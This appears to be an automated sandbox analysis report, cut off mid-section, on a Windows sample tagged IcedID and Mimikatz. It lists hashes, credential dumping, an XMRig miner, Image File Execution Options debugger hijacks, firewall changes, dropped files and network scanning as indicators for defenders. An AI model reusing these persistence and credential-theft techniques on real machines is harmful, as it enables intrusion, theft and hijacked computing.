Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-10-2024 05:00
Behavioral task
behavioral1
Sample
2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.exe
-
Size
14.3MB
-
MD5
ca0b0ad3d3b76febfac2db2bc11b3b5b
-
SHA1
4c94fa73cc9c4fc932016b5c4529c3ae52ccea29
-
SHA256
769802485eec0d5663a895aa93110462934ce75460050e8e02684c91b3e5e57e
-
SHA512
4db300f4f3c499d3b747c8e215da911f0ad88b029f2699485a7522ad7a0d4f2d6e5b767b70aae3f3d428e1bfffb9ea7a265627e2c8f24ee22ebdf7795565c4f6
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYPHlTPemknGzwHdOgEPHd9BY:a3jz0E52/iv1E3jz0E5
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
mgmtcbi.exedescription pid Process procid_target PID 428 created 2116 428 mgmtcbi.exe 38 -
Contacts a large (20658) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
Processes:
resource yara_rule behavioral2/memory/392-177-0x00007FF720760000-0x00007FF720880000-memory.dmp xmrig behavioral2/memory/392-181-0x00007FF720760000-0x00007FF720880000-memory.dmp xmrig behavioral2/memory/392-202-0x00007FF720760000-0x00007FF720880000-memory.dmp xmrig behavioral2/memory/392-215-0x00007FF720760000-0x00007FF720880000-memory.dmp xmrig behavioral2/memory/392-224-0x00007FF720760000-0x00007FF720880000-memory.dmp xmrig behavioral2/memory/392-233-0x00007FF720760000-0x00007FF720880000-memory.dmp xmrig behavioral2/memory/392-244-0x00007FF720760000-0x00007FF720880000-memory.dmp xmrig behavioral2/memory/392-251-0x00007FF720760000-0x00007FF720880000-memory.dmp xmrig behavioral2/memory/392-261-0x00007FF720760000-0x00007FF720880000-memory.dmp xmrig behavioral2/memory/392-368-0x00007FF720760000-0x00007FF720880000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
Processes:
resource yara_rule behavioral2/memory/3628-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3628-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023ca2-6.dat mimikatz behavioral2/memory/4076-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4200-138-0x00007FF733AD0000-0x00007FF733BBE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
mgmtcbi.exewpcap.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts mgmtcbi.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts mgmtcbi.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
Processes:
mgmtcbi.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe mgmtcbi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe mgmtcbi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe mgmtcbi.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 3960 netsh.exe 1472 netsh.exe -
Executes dropped EXE 27 IoCs
Processes:
mgmtcbi.exemgmtcbi.exewpcap.exeliuibviiz.exevfshost.exexohudmc.exeiyibcmiuc.exeewqksq.exeltbtbc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exemgmtcbi.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exeiyibcmiuc.exebtuizeiim.exemgmtcbi.exepid Process 4076 mgmtcbi.exe 428 mgmtcbi.exe 2344 wpcap.exe 4984 liuibviiz.exe 4200 vfshost.exe 624 xohudmc.exe 1092 iyibcmiuc.exe 2736 ewqksq.exe 392 ltbtbc.exe 672 iyibcmiuc.exe 3600 iyibcmiuc.exe 4116 iyibcmiuc.exe 244 iyibcmiuc.exe 1840 iyibcmiuc.exe 3552 mgmtcbi.exe 4844 iyibcmiuc.exe 4052 iyibcmiuc.exe 3656 iyibcmiuc.exe 4928 iyibcmiuc.exe 2004 iyibcmiuc.exe 4608 iyibcmiuc.exe 4336 iyibcmiuc.exe 1628 iyibcmiuc.exe 4136 iyibcmiuc.exe 2064 iyibcmiuc.exe 1376 btuizeiim.exe 4016 mgmtcbi.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exeliuibviiz.exepid Process 2344 wpcap.exe 2344 wpcap.exe 2344 wpcap.exe 2344 wpcap.exe 2344 wpcap.exe 2344 wpcap.exe 2344 wpcap.exe 2344 wpcap.exe 2344 wpcap.exe 4984 liuibviiz.exe 4984 liuibviiz.exe 4984 liuibviiz.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 66 ifconfig.me 67 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
wpcap.exexohudmc.exemgmtcbi.exedescription ioc Process File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\ewqksq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\ewqksq.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content mgmtcbi.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies mgmtcbi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft mgmtcbi.exe -
Processes:
resource yara_rule behavioral2/files/0x0007000000023cf3-134.dat upx behavioral2/memory/4200-135-0x00007FF733AD0000-0x00007FF733BBE000-memory.dmp upx behavioral2/memory/4200-138-0x00007FF733AD0000-0x00007FF733BBE000-memory.dmp upx behavioral2/memory/1092-146-0x00007FF75EAA0000-0x00007FF75EAFB000-memory.dmp upx behavioral2/files/0x0007000000023cfe-145.dat upx behavioral2/memory/1092-159-0x00007FF75EAA0000-0x00007FF75EAFB000-memory.dmp upx behavioral2/files/0x0007000000023cfb-163.dat upx behavioral2/memory/392-164-0x00007FF720760000-0x00007FF720880000-memory.dmp upx behavioral2/memory/672-170-0x00007FF75EAA0000-0x00007FF75EAFB000-memory.dmp upx behavioral2/memory/3600-174-0x00007FF75EAA0000-0x00007FF75EAFB000-memory.dmp upx behavioral2/memory/392-177-0x00007FF720760000-0x00007FF720880000-memory.dmp upx behavioral2/memory/4116-179-0x00007FF75EAA0000-0x00007FF75EAFB000-memory.dmp upx behavioral2/memory/392-181-0x00007FF720760000-0x00007FF720880000-memory.dmp upx behavioral2/memory/244-184-0x00007FF75EAA0000-0x00007FF75EAFB000-memory.dmp upx behavioral2/memory/1840-188-0x00007FF75EAA0000-0x00007FF75EAFB000-memory.dmp upx behavioral2/memory/4844-196-0x00007FF75EAA0000-0x00007FF75EAFB000-memory.dmp upx behavioral2/memory/4052-200-0x00007FF75EAA0000-0x00007FF75EAFB000-memory.dmp upx behavioral2/memory/392-202-0x00007FF720760000-0x00007FF720880000-memory.dmp upx behavioral2/memory/3656-205-0x00007FF75EAA0000-0x00007FF75EAFB000-memory.dmp upx behavioral2/memory/4928-209-0x00007FF75EAA0000-0x00007FF75EAFB000-memory.dmp upx behavioral2/memory/2004-213-0x00007FF75EAA0000-0x00007FF75EAFB000-memory.dmp upx behavioral2/memory/392-215-0x00007FF720760000-0x00007FF720880000-memory.dmp upx behavioral2/memory/4608-218-0x00007FF75EAA0000-0x00007FF75EAFB000-memory.dmp upx behavioral2/memory/4336-222-0x00007FF75EAA0000-0x00007FF75EAFB000-memory.dmp upx behavioral2/memory/392-224-0x00007FF720760000-0x00007FF720880000-memory.dmp upx behavioral2/memory/1628-227-0x00007FF75EAA0000-0x00007FF75EAFB000-memory.dmp upx behavioral2/memory/4136-230-0x00007FF75EAA0000-0x00007FF75EAFB000-memory.dmp upx behavioral2/memory/2064-232-0x00007FF75EAA0000-0x00007FF75EAFB000-memory.dmp upx behavioral2/memory/392-233-0x00007FF720760000-0x00007FF720880000-memory.dmp upx behavioral2/memory/392-244-0x00007FF720760000-0x00007FF720880000-memory.dmp upx behavioral2/memory/392-251-0x00007FF720760000-0x00007FF720880000-memory.dmp upx behavioral2/memory/392-261-0x00007FF720760000-0x00007FF720880000-memory.dmp upx behavioral2/memory/392-368-0x00007FF720760000-0x00007FF720880000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
mgmtcbi.exebtuizeiim.execmd.exe2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.exedescription ioc Process File created C:\Windows\jhetmctcv\UnattendGC\specials\coli-0.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\libeay32.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\svschost.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\cnli-1.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\crli-0.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\ucl.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\zlib1.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\ssleay32.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\posh-0.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\svschost.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\AppCapture32.dll mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\svschost.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\tibe-2.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\svschost.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\vimpcsvc.xml mgmtcbi.exe File created C:\Windows\ybemumnz\vimpcsvc.xml mgmtcbi.exe File created C:\Windows\ybemumnz\docmicfg.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\spoolsrv.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\libxml2.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\AppCapture64.dll mgmtcbi.exe File opened for modification C:\Windows\jhetmctcv\bctzbzczb\Result.txt btuizeiim.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\vimpcsvc.exe mgmtcbi.exe File created C:\Windows\ybemumnz\schoedcl.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\Corporate\vfshost.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\scan.bat mgmtcbi.exe File created C:\Windows\jhetmctcv\Corporate\mimilib.dll mgmtcbi.exe File opened for modification C:\Windows\jhetmctcv\Corporate\log.txt cmd.exe File opened for modification C:\Windows\jhetmctcv\bctzbzczb\Packet.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\btuizeiim.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\spoolsrv.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\docmicfg.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\Corporate\mimidrv.sys mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\ip.txt mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\exma-1.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\tucl-1.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\spoolsrv.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\vimpcsvc.xml mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\spoolsrv.xml mgmtcbi.exe File created C:\Windows\ybemumnz\mgmtcbi.exe 2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\xdvl-0.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\Shellcode.ini mgmtcbi.exe File created C:\Windows\jhetmctcv\upbdrjv\swrpwe.exe mgmtcbi.exe File created C:\Windows\ime\mgmtcbi.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\schoedcl.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\schoedcl.xml mgmtcbi.exe File created C:\Windows\ybemumnz\spoolsrv.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\liuibviiz.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\wpcap.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\trch-1.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\docmicfg.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\schoedcl.exe mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\specials\trfo-2.dll mgmtcbi.exe File created C:\Windows\jhetmctcv\UnattendGC\docmicfg.xml mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\mgmtcbi.exe 2024-10-12_ca0b0ad3d3b76febfac2db2bc11b3b5b_hacktools_icedid_mimikatz.exe File created C:\Windows\jhetmctcv\bctzbzczb\Packet.dll mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\vimpcsvc.xml mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\docmicfg.xml mgmtcbi.exe File created C:\Windows\jhetmctcv\bctzbzczb\wpcap.exe mgmtcbi.exe File created C:\Windows\ybemumnz\svschost.xml mgmtcbi.exe File opened for modification C:\Windows\ybemumnz\schoedcl.xml mgmtcbi.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 316 sc.exe 5084 sc.exe 4268 sc.exe 2172 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
